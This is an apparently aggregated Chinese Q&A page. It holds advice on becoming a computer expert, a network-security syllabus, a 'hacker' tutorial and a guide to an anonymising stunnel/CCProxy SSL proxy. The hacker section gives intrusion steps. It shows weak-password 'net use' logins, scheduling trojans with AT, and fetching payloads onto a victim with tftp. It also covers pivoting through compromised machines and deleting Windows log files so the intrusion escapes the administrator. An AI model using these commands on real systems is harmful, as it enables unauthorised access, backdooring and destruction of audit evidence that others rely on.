加密機代理
『壹』 怎麼才能成為電腦高手
想要成為電腦高手,我覺得主要從四個方面入手。
一,理論知識,必要的軟體和硬體方面的知識是要掌握的,否則,很多電腦術語你可能不懂,一般此類知識可以在書本里找到,盡量買最新版本的,類似於計算機應用基礎之類的書籍。
二,實踐知識,不可缺的部分,電腦高手都是玩出來的,沒有哪個人是靠書本學來的,不停地玩,在實際應用中發現問題,遇到的問題越多,越能促使你的提高。帶著問題去看書或是請教朋友,得到的答案才能記憶深刻。
三,運用網路,好的網爛掘告站會讓你收益非淺的,比方說網路知道,不知你有沒有發現,知道里問的最多的好象就是電腦方面的問題,由淺入深,各方面的問題都有,盡管可能一些答案不一定正確,但這里集中的都是經驗和智慧,想問什麼就問吧,一定會有朋友熱心地幫助你的。另外一些好的電腦方面的網站,如《天級網》、《華軍軟體園》等,不但有最新的軟體供下載,更重要的是有最新的軟硬體方面的咨訊,可令你增長見識。
四,報紙的作用也不可忽視,相對來說,報紙上的知識更新是最快的了,推薦一些好一點的報紙,如《電腦報》、《電腦商情報》等,不過個人覺得《電腦報》廣告太多。
總之,要想成為電腦高手,理論加實踐是最好的方法,脫離了理論知識,充其量只能算小伎倆,脫離了實踐,更慘,紙上談兵,中看不中用。
學電腦的網站:
http://hongen.com/pc/ 洪恩在線-電腦樂園
http://digi.it.sohu.com/lesson.shtml 搜狐學園
http://tech.sina.com.cn/introction 新浪_科技時代
http://www.pconline.com.cn/pce/teach/ 太平洋電腦網
http://pc-home.com.cn 學電腦
http://beyondpc.3322.net 家駒學電腦
其中「洪恩在線」最適合初學者!有很多基礎知識!要成為真正的高手,就要掌握基礎知識。
基礎:
如何去學習
·要有學習目標
·要有學習計劃
·要有正確的心態
·有很強的自學能力
學習目標
·1.明確自己的發展方向(你現在或者將來要做什麼,程序員?安全專家?網路黑客等)
·2.自己散孫目前的水平和能力有多高
·能簡單操作windows2000
·能簡單配置windows2000的一些服務
·能熟練的配置Windows2000的各種服務
·能熟練配置win2000和各種網路設備聯網
·能簡單操作linux,Unix,Hp-unix, Solaris中的一種或者多種操作系統
·能配置cicso,huawei,3com,朗迅等網路設備
·會簡單編寫C/C++,Delphi,Java,PB,VB,Perl
·能簡單編寫Asp,Php,Cgi和script,shell腳本
·3.必須學會不相信態度,尊重各種各樣的能力
·不要為那些裝模做樣的人浪費時間
·尊重別人的能力,
·會享受提高自己能力的樂趣.
·在知道了自己的水平和能力之後就要開始自己的目標了
·--------安全專家
·--------黑客
·--------高級程序員
·黑客是建設網路,不是破壞網路, 破壞者是駭客;
·黑客有入侵的技術,但是他們是維護網路的,所以和安全專家是差不多的;
·因為懂得如何入侵才知道如何維護
·因為懂得如何維護才更要了解如何入侵
·這是 黑客與安全專家的聯系
·但,他們都是在會編程的基礎上成長的!
·下面我們開始我們的學習計劃!
學習計劃
有了學習計劃才能更有效的學習
安全學習計劃
不奢求對win98有多麼精通,我們也不講解win98如何應用,如何精通,我們的起步是win2000 s
erver,這是我們培訓的最低標准,你對英語有一定的了解也是必不可少
最基礎
·a.會裝win2000,知道在安裝的時候有兩種分區格式,NTFS與FAT32 及他們的區別,知道win2
000可以在安裝的時候分區,格式化硬碟, 可以定製安裝,可以定製自己需要安裝的一些組件
,如果有網路適配器,可以直接加入域中 學習點:NTFS和FAT32分區的不同 各個組件的作用
域的定義
·b.知道飢明如何開,關機 知道注銷的用處
·c.知道win2000下面各主要目錄的作用 Documents and Settings,WINNT,system32 Progra
m Files
·d.知道管理工具裡面各個組件的定義
·e.學會應用命令提示符cmd(dos)
·f.知道計算機管理裡面的各個選項的不通
·g.知道win2000強大的網路管理功能
·h.能非常熟練的操作win2000
·i.知道IP地址,子網掩碼,網關和MAC的區別
進階
·A.配置IIS,知道各個選項的作用
·B.配置DNS,DHCP
·C.配置主控制域,輔助域
·D.配置DFS
·E.配置路由和遠程訪問
·F.配置安全策略IPSEC
·G.配置service(服務)
·H.配置磁碟管理,磁碟分額
·i. 配置RAID(0,1,0+1,5)
·J.路由器的安裝與簡單配置
·K.交換機的安裝與簡單配置
·L.常見的VPN,VLAN,NAT配置
·M.配置常見的企業級防火牆
·N.配置常見的企業級防病毒軟體
高級
·之前我們學到的是任何一個想成為網路安全專家和黑客基本知識中的一部分
·你作到了嗎??
·如果你做到了,足以找到一份很不錯的工作!
配置負載均衡
·配置WIN2000+IIS+EXCHANGE+MSsql+SERVER-U+負載均衡+ASP(PHP.CGI)+CHECK PIONT(ISA
SERVER) ·
·配置三層交換網路 ·
·配置各種復雜的網路環境
·能策劃一個非常完整的網路方案 ·
·能獨自組建一個大型的企業級網路 ·
·能迅速解決網路中出現的各種疑難問題
結束
·在你上面的都學好了,你已經是一個高級人才了,也是我們VIP培訓的目標!
·可以找到一份非常好的工作
·不會再因為給女朋友買不起玫瑰而發愁了!
安全:
導讀
·系統安全服務(SYSTEM)
·防火牆系統(FIREWALL)
·入侵檢測(IDS)
·身份驗證(CA)
·網站監控和恢復(WEBSITE)
·安全電子商務(E-BUSINESS)
·安全電子郵件(E-MAIL)
·安全辦公自動化(OA)
·Internet訪問和監控(A&C)
·病毒防範(VIRUS)
·虛擬區域網(VPN)
系統安全服務
·系統安全管理
·系統安全評估
·系統安全加固
·系統安全維護
·安全技能學習
系統安全管理
·信息系統安全策略
·信息系統管理員安全手冊
·信息系統用戶安全手冊
·緊急事件處理流程
系統安全評估
1、系統整體安全分析
· 分析用戶的網路拓撲結構,以找出其結構性及網路 配置上存在的安全隱患。
· 通過考察用戶信息設備的放置場地,以使得設備物理上是安全的。
· 分析用戶信息系統的管理、使用流程,以使得系統 能夠安全地管理、安全地使用
2、主機系統安全檢測
· 通過對主機進行安全掃描,以發現系統的常見的安全漏洞。
· 對於特定的系統,採用特別的工具進行安全掃描。
· 根據經驗,對系統存在的漏洞進行綜合分析。
· 給出系統安全漏洞報告。
· 指出各個安全漏洞產生的原因以及會造成的危險。
· 給出修復安全漏洞的建議
3、網路設備安全檢測
· 通過對網路進行安全掃描,以發現網路設備的安全漏洞。
· 根據經驗,對網路設備存在的漏洞進行綜合析。
· 給出網路設備安全漏洞報告。
· 指出各個安全漏洞產生的原因以及會造成的險。
· 給出修復安全漏洞的建議。
安全系統加固
·為用戶系統打最新安全補丁程序。
·為用戶修復系統、網路中的安全漏洞。
·為用戶去掉不必要的服務和應用系統。
·為用戶系統設置用戶許可權訪問策略。
·為用戶系統設置文件和目錄訪問策略。
·針對用戶系統應用進行相應的安全處理。
安全系統維護
·防火牆系統維護,安全日誌分析
·IDS系統維護,安全日誌分析
·VPN系統維護,安全日誌分析
·認證系統維護,安全日誌分析
·伺服器、主機系統,安全日誌分析
·其它各類安全設施維護及日誌分析
安全技能培訓
·網路安全基礎知識
·網路攻擊手段演示和防範措施
·防火牆的原理和使用
·VPN的原理和使用
·漏洞掃描工具的原理和使用
·IDS(入侵檢測系統)的原理和使用
·身份認證系統的原理和使用
·防病毒產品的原理和使用
·系統管理員安全培訓
·一般用戶安全培訓
防火牆系統
·防火牆的定義
·防火牆的分類
·包過濾防火牆
·應用網關防火牆
·狀態檢測防火牆
·一般企業防火牆配置
·政府機構防火牆配置
·涉密網路保密網關配置
·高可用性和負載均衡防火牆系統
·高速防火牆系統
防火牆的定義
·用以連接不同信任級別網路的設備。
·用來根據制定的安全規則對網路間的通信進行控制
防火牆的分類
·包過濾 (Packet Filters)
·應用網關 (Application Gateways)
·狀態檢測(Stateful Inspection)
包過濾防火牆
·包 過 濾 技 術
·主要在路由器上實現,根據用戶定義的內容(如IP地址、埠號)進行過濾。包過濾在網
絡層進行包檢查與應用無關。
· 優 點
· 具有良好的性能和可伸縮性。
· 缺點
· 由於包過濾技術是對應用不敏感的,無法理解特定通訊的含義,因而安全性很差。
應用網關防火牆
·應用網關技術
·第二代防火牆技術,其在應用的檢查方面有了較大的改進,能監測所有應用層,同時對應
用「內容」(Content Information)的含義引入到了防火牆策略的決策處理。
· 優點
· 安全性比較高。
· 缺點
· 1、該方法對每一個請求都必須建立兩個連接,一個從客戶端到防火牆系統,另一個從
防火牆系統到伺服器,這會嚴重影響性能。
· 2、防火牆網關暴露在攻擊者之中。
· 3、對每一個代理需要有一個獨立的應用進程或 daemon 來處理, 這樣擴展性和支持
新應用方面存在問題。
檢測狀態防火牆
· 屬第三代防火牆技術,克服了以上兩種方法的缺點,引入了OSI全七層監測能力,同時
又能保持 Client/Server的體系結構,也即對用戶訪問是透明的。
· 防火牆能保護、限制其他用戶對防火牆網關本身的訪問。
· 狀態檢測技術在網路層截獲數據包後交給INSPECT Engine,通過 INSPECT Engine 可以
從數據包中抽取安全決策所需的所有源於應用層中的狀態相關信息,並在動態狀態表中 維
持這些信息以提供後繼連接的可能性預測。該方法能提供高安全性、高性能和擴展性、高伸
縮性的解決方案。
入侵檢測系統
·處理攻擊時遇到的典型問題
·解決入侵的方法和手段
·基於網路的入侵檢測
·基於主機的入侵檢測
·入侵檢測系統典型配置
處理攻擊時遇到的問題
·獲得的信息不足
·不知到網路上發生了什麼事。
·無法判定系統是否已經被入侵。
·信息不準確
·人員少
·沒有足夠的人員維護管理。
·缺乏規范的處理程序
·發現攻擊時如何反應?
·下一步該如何處理?
解決入侵的方法和手段
·採用入侵實時入侵監控系統(IDS)
·對系統、網路中發生的事件進行實時監控。
·當發生入侵事件時能即時反應。
·對入侵事件進行詳細記錄並跟蹤。
基於主機的入侵檢測
·軟體模塊安裝在包含有重要數據的主機上
·監視操作系統的日誌以發現攻擊的特徵。
·監視代理所處主機上的所有進程和用戶.
·監視暴力登錄攻擊(brute-force login), 試圖改變或繞過安全設定,及特權的濫用等
。
·當新的日誌產生時,為了減小對CPU的影響,代理程序暫時中斷。
基於網路的入侵檢測
·軟體安裝在專門的主機上,放置於關鍵的網段
·將配置該軟體主機的網卡設置為混雜模式,使得該主機能接受網段上所有的包。
·分析數據包以判斷是否有黑客攻擊。
·監視網段上的所有數據。
·對網路的流量無任何影響。
·能檢測到 denial of service attacks, unauthorized access attempts, pre-attack s
cans等攻擊。
身份認證系統
·用戶身份認證的方法
·不同認證方法的安全級別
·用戶身份認證的常用方式
·解決問題的方法
·目前比較成熟的雙因素認證方法
用戶身份驗證
·你知道的一些東西
· 密碼, 身份證號,生日
·你有的一些東西
· 磁卡, 智能卡,令牌, 鑰匙
·你獨有的一些東西
· 指紋,聲音,視網膜
密碼是不安全的
·可以破解密碼的工具太多
·大多密碼在網路中是明文傳輸的
·密碼可以網路離線時被窺測
·密碼和文件從PC和伺服器上被轉移了
·好記的密碼容易被猜到,不易猜測的密碼又太難記
解決方法
·使用混合的工具:如IC卡+PIN
網站監控與恢復系統
·典型的Web伺服器應用
·Web伺服器存在的安全問題
·網站安全解決方法
典型web伺服器應用
·Internet-->路由器-->防火牆-->web站點
· |
· |
· 內部網
·所有的放在防火牆後面
Web伺服器存在的安全問題
· 網頁被非法篡改是網站內容提供者最頭痛的問題。在採用防火牆後,Web伺服器本身的漏
洞成為了網站被黑的主要問題。
· Web應用伺服器(如IIS,Apache中存在著大量的安 全漏洞.)
· 用戶自己開發的CGI、ASP、PHP應用中存在著大量潛在的漏洞。
網站安全
·採用Web伺服器監控與恢復系統
·該系統提供對網站文件內容的實時監控,發現被改動後立即報警並自動恢復。
電子商務安全系統
·典型的電子商務應用
·電子商務中存在的安全問題
·電子商務的安全解決方法
·實時數據交換系統
典型電子商務應用
·Internet--->防火牆--->Web伺服器
· || |
· || |
· 內部網(資料庫)
電子商務中存在的安全問題
·1、Web伺服器端
·Web應用伺服器(如IIS、Apache中存在著大量的安全漏洞。用戶自己開發的CGI、ASP、PH
P應用中存在著潛在的漏洞。
· 黑客通過這些漏洞攻擊Web伺服器,可非法篡改網頁,造成惡劣影響,動搖了電子商務使
用者的信心。
· 甚至可獲得Web伺服器上大量的敏感資料,如用戶的信用卡號,用以連接內部資料庫的帳
號和口令。
· 可能通過控制Web伺服器,來攻擊內部資料庫。
電子商務中存在的安全問題
·2、SSL協議
·SSL加密強度低。由於瀏覽器默認的加密模塊只支持40位的低強度加密,而且即使在瀏覽
器中安裝更高位的加密模塊,由於WEB伺服器不提供對高位SSL鏈接的支持同樣無法實現高強
度SSL加密鏈接。
· 無法解決電子商務中的用戶簽名。SSL鏈接建立WEB伺服器和用戶瀏覽器之間的安全通道
只能保證在安全通道內的信息不被竊聽或篡改,並不能對用戶發送的信息進行簽名以保證信
息的有效性和不可抵賴性,而這正是電子商務中必須解決的問題。
電子商務的安全解決方法
·將WEB伺服器分為兩部分:一般內容的WEB伺服器和交易WEB伺服器。
· 一般內容的WEB伺服器放置在DMZ區內,採用WEB站點監控和恢復系統保護,防止主頁被非
法改動。
· 交易WEB伺服器放置在內部網內,通過一台物理分隔的實時數據交換系統將其與DMZ區相
連。
· 在客戶機和伺服器端安裝SSL代理,從而獲得128位的高強度加密通道
實時數據交換系統
·將系統外部 Web伺服器和內部應用Web伺服器物理隔開.
·外部Web伺服器用於存放一般的信息,內部Web服 務器用於存放敏感信息,並和內部數據
庫連接。
·外部用戶通過http訪問位於DMZ區內的一般Web伺服器。
·當進行交易時,用戶需訪問位於內部網內的應用伺服器。
·https連接首先到達實時數據交換系統的虛擬外部Web伺服器,實時數據交換系統將https
協議解開,只將https連接的數據內容拷貝到虛擬內部Web伺服器,虛擬內部Web伺服器將使
用該數據重新發起https連接到實際的內部應用Web伺服器.
·內外通過實時數據交換系統進行數據交換,無任何協議和連接穿過實時數據交換系統。
·即使DMZ區的Web伺服器受到攻擊, 攻擊者也的不到任何有用的信息
安全電子郵件系統
·電子郵件的安全問題
·安全電子郵件的解決方法
·一個安全郵件的使用過程
電子郵件的安全問題
·如何保證發送的敏感信息不被泄漏
·如何保證發送的信息不被篡改
·如何確認發件人的真實身份
·如何防止發件人的抵賴行為
安全電子郵件的解決方法
·將PKI體系應用到郵件系統中
·郵件的加密和解密以實現數據的保密。
·郵件的數字簽名(鑒別)實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可靠的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系。
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。
辦公自動化系統的安全問題
· 如何保證發送的敏感信息不被泄漏
· 如何保證發送的信息不被篡改
· 如何確認發件人的真實身份
· 如何防止發件人的抵賴行為
安全辦公自動化系統的解決方法
·將PKI體系應用到辦公自動化系統中
·工作流信息的加密和解密以實現數據保密
·工作流信息的數字簽名(鑒別)實現發件人認證和不可抵賴。
·完整性校驗功能防止信息傳輸過程中被篡改可靠的安全性。
·採用公開密鑰和對稱密鑰相結合的密鑰體系
·支持128bit對稱密鑰演算法和1024bit公開密鑰演算法。
Internet訪問及控制系統
·Internet使用存在的問題
·Internet使用的解決方法
·內容緩存系統
·Internet站點過濾系統
Internet訪問存在的問題
·Internet接入帶寬不足,訪問比較慢。
·大量的用戶訪問相同的內容,造成帶寬的進一步擁擠。
·在上班時間里大量的Internet訪問是與業務無關的。
·有人使用公司的Internet系統訪問色情網站。
·有人使用公司的Internet系統訪問反動站點。
·管理人員無法知道Internet系統的使用情況。
Internet訪問的解決方法
· 對於問題一,採用內容緩存系統。
· 對於問題二,採用Internet 站點過濾系統。
內容緩存系統
·1、Client 發起http連接請求
·2、Proxy 收到請求後將檢查內部緩存內是否有所需內容,若有,則返還給Client。
·3、若無,則Proxy根據請求向目的伺服器發起請求。
·4、Web伺服器將內容返回到Proxy伺服器。
·5、Proxy伺服器將得到的內容發回給Client,並在自己的緩存中保存一份。
Internet站點過濾系統 (一)
·1、Client 發起http連接請求
·2、連接到達防火牆時防火牆將URL送到WebSense Server 檢查。
·3、WebSense 將審查結果返回到防火牆。
·4、防火牆根據其策略決定是否讓該連接通過。
Internet站點過濾系統 (二)
·1、Client 發起http連接請求
·2、Proxy 受到請求後將URL送到WebSense Server檢查。
·3、Proxy根據返回的結果決定是否接收該連接請求。
病毒防範系統
· 互連網時代對防病毒系統的要求
· 計算機病毒解決方法
· 典型病毒防範系統部署
互聯網時代對防病毒系統的要求
· 由於計算機的聯網使用,使得病毒傳播的途徑大為增多:網路文件共享、電子郵件、Int
ernet文件下載,傳播速度也大為加快。
· 新病毒的出現速度加快,用戶的防病毒軟體的病毒特徵碼沒能及時更新。
· 目前已出現了惡意的Java、ActiveX,當使用者瀏覽到包含這些代碼的網頁時,會造成安
全問題。
· 一些來歷不明的電子郵件程序或下載的程序中帶有特洛依木馬,可能會造成受害者的主
機被他人控制。
計算機病毒解決方法
· 從系統的觀點考慮病毒的防範,在所有病毒傳輸的途徑上均配置防病毒軟體,如客戶端
(Win98、 · Win2000)、文件伺服器(NT、Netware)、郵件伺服器(Exchange、Lotus
Notes)、Internet接入系統(Proxy、Firewall)等。
· 整個病毒防範系統採用集中管理的方式,病毒特徵碼統一更新,安全策略集中設定,從
而使得整個網路系統的病毒特徵碼得到快速更新。
· 通過在客戶端的瀏覽器和Proxy、Firewall中嵌入病毒檢查軟體,來防範下在程序中帶有
的病毒和可能的惡意Java、ActiveX等可執行代碼的攻擊。
VPN(虛擬私有網)
· 數據加密分類
· 物理線路加密
· 數據鏈路加密
· 網路層加密—IPSec
· 傳輸層加密—SSL
數據加密類型
·物理層->物理層 物理線路加密
·數據鏈路層->數據鏈路層 (路由器訪問)
·在數據鏈路層(如PPP)進行加密 L2TP、PPTP、L2F
·網路層->網路層(路由器 防火牆 主機)
·在網路層 (如IP)進行加密 IPSec
·傳輸層->傳輸層 (對TCP進行加密 SSL)
·應用層->應用層(在應用層 (如TCP)進行加密 S/MIME、SET、SSH)
物理線路加密
· DDN 加密機
· 幀中繼加密機
· 非同步撥號Modem
· ISDN線路密碼機
· ATM加密機
注:傳輸層加密
·Secure Sockets Layer (SSL) 是一個端到端的Internet 安全協議,通過採用數字證書,
它提供了數據加密、身份認證的功能。SSL建立在傳輸層,它為客戶機和伺服器在應用級建
立起一個端到斷的安全會話。
·SSL代理—128位的高強度加密模塊
結束語·恭喜你:
·學完這些並且可以熟練應用,已經是一個真正的網路安全專家了!
·希望此時的你旁邊有個溫柔稍有點調皮的女朋友,為這孤獨而寂寞的網路添加一點跳動的
色彩!
黑客編:
必須要掌握的幾個命令
·Net
·netsh
·ftp
·hostname
·Telenet(nc)
·tracert
·At
·Tftp
·Netstat
·Regedit
·Ping
必須要掌握的幾個協議
·http
·dns
·ftp
·Pop
·Smtp
·Icmp
·Udp
·tcp
開始
·掌握了黑客攻擊的方式和手段後,那麼學習黑客就簡單多了!
·因為你掌握了這些,剩餘的就是使用工具入侵
·熟悉掌握一套自己用的黑客工具
高級
·自己編寫專用的黑客工具
·自己發現系統漏洞
黑客入侵手段
·收集信息:
· 收集要入侵的目標信息
· IP,域名,埠,漏洞,位置
弱口令
·在nt\2000\xp\2003中弱口令可以用
·Net use \ip 「password」 /user:user
·如果目標機開3389服務,可以直接連接
·在sql的sa弱口令,可以用sql連接器直接 ·登陸
後門木馬
·如果有ipc$共享,可以過去木馬後門
·用at啟動
·AT \ip time /INTERACTIVE
·如果可以得到shell,也可以用tftp
·Tftp.exe –i ip get *.* *.*
·然後直接安裝 ·如果有3389,可以自己建一個iis,下載 直接運行
密碼破解
·遠程破解mysql,mssql,ftp,mail,共享密碼
·本地破解管理員(administrator)密碼
緩沖溢出
·可以用緩沖溢出攻擊,
·比如流行的webdev,rdcom模塊漏洞
·可以直接得到system管理許可權
·緩沖溢出後的一般現象是:
·Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
Web服務漏洞
·例如:
·Unicode漏洞遍歷磁碟和執行程序
·二次編碼漏洞遍歷磁碟和執行程序
·.HTR漏洞查看源代碼
嗅探監聽
·例如:
·針對web監聽
·針對mail監聽
·工具如:sinffer , iris
欺騙攻擊
·例如:
·運用arp欺騙攻擊
偽裝欺騙
·常見的如:mail病毒
·把一個文件改名字甚至圖標,欺騙對方執行
社會工程學
·例如:
·QQ聊天誘惑
·EMAIL信息
·電話
·誘惑
拒絕服務
·例如:
·Dos攻擊
·Ddos攻擊
利用跳板
·利用自己的肉雞作為跳板攻擊別的機器
·My PC------>跳板(肉雞)--->目標
路由器漏洞
·如:
·原始密碼
·程序漏洞
防火牆
·利用欺騙攻擊防火牆,導致防火牆功能失效
·利用防火牆的模塊漏洞
unix/linux
·NetWare Linux unix solais Solaris hp-unix Aix 等
·這些目前先不講解
精通黑客工具
·必須有一套自己可以完全掌握的黑客工具
·如埠掃描 Nscan,bluescanport
·監聽工具:sinffer iris
·telnet工具:nc
·掃描工具:sss,nmap, LANguard
·後門工具:radmin,winshell
·密碼破解:lc4
·遠程管理:pcanywhere
·會使用各種經典的黑客工具
清除日誌
·在你入侵機器以後,離開的時候,要完全清除
·自己在那台機器上留下的痕跡
·例如清除
·Del C:\WINNT\system32\LogFiles\*.*
·Del C:\WINNT\system32\*.log
·Del C:\WINNT\system32\*.txt
·Del C:\WINNT\*.log
·Del c:\winnt\*.txt
如果你不清除日誌
·當目標機器的管理員發現你的證據
·完全可以讓你在大牆內渡過一段日子
黑客
·當你完全掌握這些後
·你就成為了一名小黑客
高級
·編寫自己的黑客工具
·發現系統漏洞
高級黑客
·目前你足以成為一個高級黑客了
真正的黑客
·精通各種網路協議
·精通操作系統
·精通編程技術
·精通安全防護
·不搞破壞
·挑戰技術難題
結束
·想學好這些,並不是靠別人給你的,而是靠自己的努力,自己的自學得到的!
·別人只能指導你,怎麼去做,只能告訴方法,
·真正的實施是你自己,經過N*N個日夜努力換來的
·不要一個問題問多次,要多動手,動腦!
·Google裡面有太多的答案,為什麼我搜索不到?因為你的關鍵字用的不對!
·黑客基地是為了培養出一批優秀的網路人才,讓更多想學習網路的愛好者有一個理想的學
習環境
·這三篇幻燈片是我們多年的經驗得到的!
·很有價值,望好好保存!仔細研究!
『貳』 如何製作和使用高度匿名加密代理伺服器
先簡單介紹一下代理的分類:
代理分:Level 1~Level 5 五個等級;
或者也可以分為3類:·
A .全匿名代理不改變你的Request
Fields,使伺服器端看來就像有個真正的客戶瀏覽器在訪問它。當然,你的真實IP是隱藏起來的。伺服器的網管不會認為你使用了代理。
B· 普通匿名代理能隱藏你的真實IP,但會更改你的Request
Fields,有可能會被認為使用了代理,但僅僅是可能,一般說來是沒問題的。不過不要受它的名字的誤導,其安全性可能比全匿名代理更高,有的代理會剝離你的部分信息(就好比防火牆的Stealth
Mode),使伺服器端探測不到你的操作系統版本和瀏覽器版本。
C· 透明代理(簡單代理)改編你的Request Fields,並會傳送真實IP。
你訪問的網站會把你看的一清二楚,知道你用了代理,知道代理的IP,也知道你的真實IP。
一般Level3?-Level5屬於 透明代理; Level 1-Level3 屬於匿名代理! 全匿名代理有時也稱為超級代理!
不想讓網管(國內代理伺服器}或者ISP(國外代理伺服器)知道我想去哪去過哪,那把你的連接請求用SSL加密就行了.
有了匿名功能再加上加密的連接,隱身術終於練成!
製作和使用這個代理需要的軟體是CCPROXY 6.2,STUNNEL,OPENSSL,SOCKSCAP.都是免費軟體,CC3個用戶就夠了.
假設你已經有了一台遠程機器A做代理伺服器,你自己的機器為B.
在A機上,我們要開一個SOCKS5的本地代理埠,並且用SSL加密他的傳輸.首先,在CCPROXY里啟用SOCKS5的代理服務,假設埠是 1080,創建一個用戶,驗證方式為用戶名/密碼/IP混合,假設用戶名密碼都是123,IP為127.0.0.1,記得順便把"禁止區域網外用戶訪問" 勾上,因為遠程的B機不會直接訪問這個服務,免得老人人來掃密碼.下面是關鍵,打開CCPROXY.INI文件,修改並確認下面2個參數:
EnableProxyConnection=0
EnableReferer=0
這樣別人就不知道你使用了代理,也不知道你從哪兒來.好像CC6.0也支持這兩個參數,不過官方是6.3才在FAQ裡面寫出來.
然後配置STUNEEL.CONF文件,內容如下:
cert=stunnel.pem
key = stunnel.pem
taskbar=no #這個參數可以隱藏STUNELL的圖標,如果做壞事就用$%#%#
client=no
[socks2ssl]
accept = 80 #在80埠監聽,准備接受外部連接.
connect = 127.0.0.1:1080 #連接CCPROXY開的SOCKS5服務埠
把監聽埠設為80的原因是極端的假設B機前面的防火牆只允許B機訪問80埠,如果沒這個限制,隨便設一個.
代理伺服器做好了,我們要配置一下B機這個客戶端.
首先是客戶端的STUNNEL.CONF
client = yes
[ssl2SOCKS]
accept = 127.0.0.1:8282 #在本地啟用8282埠的SOCKS5代理服務
connect = AAA.AAA.AAA.AAA:80 #連接到你的代理伺服器A,地址或者域名+埠
然後設置SOCKSCAP,設置代理類型SOCKS5,地址127.0.0.1,埠8282,用戶密碼驗證(啟動SOCKSCAP會讓你輸入,就是前面設置的123了),DNS解析選先本地再遠程.
最後,把你的瀏覽器,例如IE,拉入SOCKSCAP,可以去 http://proxyjudge.org/
驗證你的匿名度了!通常就是下面這樣的結果.
REMOTE_HOST=AAA.AAA.AAA.AAA
REMOTE_ADDR=AAA.AAA.AAA.AAA
HTTP_ACCEPT=*/*
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=proxyjudge.net
HTTP_REFERER=http://proxyjudge.org/
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
Maxthon; SV1)
--------------------------------------------------------------------------------
REMOTE_HOST
Result
IP Addr.
Comment
I have no idea because DNS lookup failure.
HTTP Env. value
Result
NoProxy!
Comment
Like no proxy server.
AnonyLevel : 1
REMOTE_HOST that is IP addr. is precious.
或者B機上面裝個個人防火牆例如ZONEALARM,啟用它的隱私保護,那麼
HTTP_ACCEPT_LANGUAGE
HTTP_USER_AGENT
這些本機信息也都會被隱藏.
後記:最初只是通過CCPROXY+STUNNEL建一個HTTP的SSL伺服器通道,然後本機也是直接用STUNNEL連接出來的HTTP代理,但是驗證匿名度的時候始終是Level2,3,讓人很不爽.知道後來看了一些關於CCPROXY和SOCKS5的資料,試著轉換角度弄一下,終於成功了.其實用SOCKSCAP還有一個好處,他可以過濾某些數字開頭的IP
跳過代理直接連接,如果你的代理伺服器駕在國外,你只要把國內主要的一些IP數字開頭例如:202.96. 61.141等等加到那個過濾列表裡面,就可以解決國外代理訪問國內網站很慢的問題了.